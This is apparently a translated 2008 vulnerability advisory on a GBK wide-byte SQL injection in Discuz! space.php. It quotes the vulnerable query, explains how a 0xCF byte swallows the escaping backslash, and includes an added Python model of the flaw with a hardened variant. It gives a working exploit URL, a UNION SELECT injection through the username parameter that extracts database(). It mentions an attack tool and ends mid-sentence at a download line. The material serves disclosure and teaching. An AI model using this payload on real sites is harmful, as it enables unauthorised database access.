Aug 17, 2008 - 12:00 a.m.

Discuz! space.php injection vulnerability analysis - Vulnerability Alert - Black Bar Safety Net


$member = $db->fetch_first("SELECT m.*, mf.*, u.grouptitle, u.type, u.creditshigher, u.creditslower, u.readaccess,
u.color AS groupcolor, u.stars AS groupstars, u.allownickname, u.allowuseblog, r.ranktitle,
r.color AS rankcolor, r.stars AS rankstars $oltimeadd1
FROM {$tablepre}members m
LEFT JOIN {$tablepre}memberfields mf ON mf.uid=m.uid
LEFT JOIN {$tablepre}usergroups u ON u.groupid=m.groupid
LEFT JOIN {$tablepre}ranks r ON m.posts>=r.postshigher
WHERE ".($uid ? "m.uid='$uid'" : "m.username='$username'")." ORDER BY r.postshigher DESC LIMIT 1");

Source: Discuz! space.php (the user space function)

The username value is embedded directly in this query. Under a double-byte character set such as GBK this lets an attacker inject SQL through the encoding; the UTF-8 build of the program does not have this vulnerability.

Similar encoding-based injection vulnerabilities have been appearing frequently recently. The cause is that under an encoding such as GBK the PHP side does not filter the quote character effectively: the escaping routine prefixes the quote with a backslash (0x5C), but when the preceding byte is a valid GBK lead byte (0xCF in the exploit below), the lead byte and the backslash are read together as one two-byte character, so the backslash is consumed and the quote reaches MySQL unescaped. A program running under UTF-8 does not have this problem: no such encoding conversion error occurs, the quotation mark stays escaped, and the encoding injection is eliminated.

Exploit method:

http://<host>/space.php?username=%cf'%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*
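As an added example (not code from the advisory or from Discuz!), the following Python script models the byte-level mechanism behind the exploit above and the explanation before it. The function names, the shortened payload and the two helper routines are the editor's own: addslashes() stands in for PHP's byte-wise addslashes()/magic_quotes escaping, decoding the finished clause in a given charset stands in for what the database server sees, and hardened_where() stands in for charset-aware escaping of the kind mysql_real_escape_string() provides when the connection charset is set correctly.

```python
# Added example: a byte-level model of the GBK "wide byte" injection described
# above. It is not code from the advisory or from Discuz!; addslashes() below
# stands in for PHP's addslashes()/magic_quotes, and decoding the finished
# clause in the connection charset stands in for the server parsing it.

# Constructed payload in the shape of the exploit URL (%cf' UNION SELECT ... /*),
# with a short column list instead of the 83 columns the real query needs.
PAYLOAD = b"\xcf' UNION SELECT 1,2,database()/*"

QUOTE, DQUOTE, BACKSLASH, NUL = 0x27, 0x22, 0x5C, 0x00


def addslashes(data: bytes) -> bytes:
    """Model of PHP addslashes(): byte-wise, charset-unaware escaping."""
    out = bytearray()
    for b in data:
        if b in (QUOTE, DQUOTE, BACKSLASH, NUL):
            out.append(BACKSLASH)
        out.append(b)
    return bytes(out)


def vulnerable_where(username: bytes) -> bytes:
    """The WHERE clause space.php builds: m.username='$username' after byte-wise escaping."""
    return b"m.username='" + addslashes(username) + b"'"


def hardened_where(username: bytes, charset: str):
    """Charset-aware variant (hypothetical name): reject byte sequences that are not
    valid in the charset, escape per character, then re-encode.
    Returns None when the input is rejected; real code would abort the request."""
    try:
        text = username.decode(charset)  # strict: a lone lead byte such as 0xCF raises
    except UnicodeDecodeError:
        return None
    escaped = "".join(("\\" + ch) if ch in "'\"\\\x00" else ch for ch in text)
    return b"m.username='" + escaped.encode(charset) + b"'"


def literal_terminates_early(where_clause: bytes, charset: str) -> bool:
    """Decode the clause the way the server would and walk the quoted value.
    True if an unescaped quote closes the literal before the intended closing
    quote, i.e. the attacker broke out of the string."""
    text = where_clause.decode(charset, errors="replace")
    i = text.index("'") + 1          # first character inside the literal
    last = len(text) - 1             # position of the intended closing quote
    while i < len(text):
        if text[i] == "\\":
            i += 2                   # escaped character: skip it whole
            continue
        if text[i] == "'":
            return i != last
        i += 1
    return False


if __name__ == "__main__":
    clause = vulnerable_where(PAYLOAD)
    print("escaped bytes:", clause)
    for cs in ("gbk", "utf-8"):
        print(f"{cs:6s} server sees: {clause.decode(cs, errors='replace')!r}"
              f" -> broke out of literal: {literal_terminates_early(clause, cs)}")
    print("hardened (gbk) rejects payload:", hardened_where(PAYLOAD, "gbk") is None)
```

Under GBK the bytes 0xCF 0x5C decode as a single ideograph, so the backslash that addslashes() inserted disappears and the following quote terminates the literal, letting the UNION run. Under UTF-8 the stray 0xCF is an invalid lead byte that never absorbs the backslash, so the quote remains escaped. The hardened variant refuses the payload outright because a lone 0xCF is not valid GBK, and for a well-formed GBK name followed by a quote it escapes the quote as its own character.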

Attached is a screenshot of the tool; I had to rewrite it twice... the Delphi TGIFIMAGE control didn't install properly ~ tired...

Download can go directly to